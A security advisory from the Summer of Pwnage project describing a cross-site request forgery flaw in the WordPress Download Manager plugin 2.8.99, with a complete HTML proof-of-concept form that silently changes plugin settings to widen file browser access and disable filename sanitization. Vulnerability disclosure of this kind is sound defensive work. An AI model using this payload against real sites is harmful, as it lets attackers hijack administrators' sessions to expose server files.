WordPress Download Manager 2.8.99 Cross Site Request Forgery
Posted on 03 March 2017
------------------------------------------------------------------------ Cross-Site Request Forgery in WordPress Download Manager Plugin ------------------------------------------------------------------------ Burak Kelebek, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Request Forgery vulnerability has been found in the WordPress Download Manager Plugin. By using this vulnerability an attacker can change confidential settings of the plugin. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160722-0005 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on WordPress Download Manager version 2.8.99. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ There is currently no fix available. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_download_manager_plugin.html The Download Manager plugin lacks a CSRF (nonce) token on the request of saving settings. Because of this an attacker is able to change confidential settings like file browser access and browser base dir by luring a logged-in admin to follow a malicious link containing the proof of concept below. Proof of concept The proof of concept below gives file browser access to a user with Editor privileges: <html> <body> <form action="http://<target>/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="task" value="wdm_save_settings"/> <input type="hidden" name="action" value="wdm_settings"/> <input type="hidden" name="section" value="basic"/> <input type="hidden" name="wpdm_permission_msg" value="Access Denied"/> <input type="hidden" name="wpdm_login_msg" value="<a href='http://<target>/wp-login.php'>Please login to download</a> "/> <input type="hidden" name="_wpdm_file_browser_root" value="/srv/www/wordpress-default/"/> <input type="hidden" name="_wpdm_file_browser_access[]" value="editor"/> <input type="hidden" name="_wpdm_file_browser_access[]" value="administrator"/> <input type="hidden" name="__wpdm_sanitize_filename" value="0"/> <input type="hidden" name="__wpdm_download_speed" value="4096"/> <input type="hidden" name="__wpdm_download_resume" value="1"/> <input type="hidden" name="__wpdm_support_output_buffer" value="1"/> <input type="hidden" name="__wpdm_open_in_browser" value="0"/> <input type="hidden" name="_wpdm_recaptcha_site_key" value=""/> <input type="hidden" name="_wpdm_recaptcha_secret_key" value=""/> <input type="hidden" name="__wpdm_disable_scripts[]" value=""/> <input type="hidden" name="__wpdm_login_url" value=""/> <input type="hidden" name="__wpdm_register_url" value=""/> <input type="hidden" name="__wpdm_user_dashboard" value=""/> <input type="submit"/> </form> </body> </html> ------------------------------------------------------------------------ Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way.
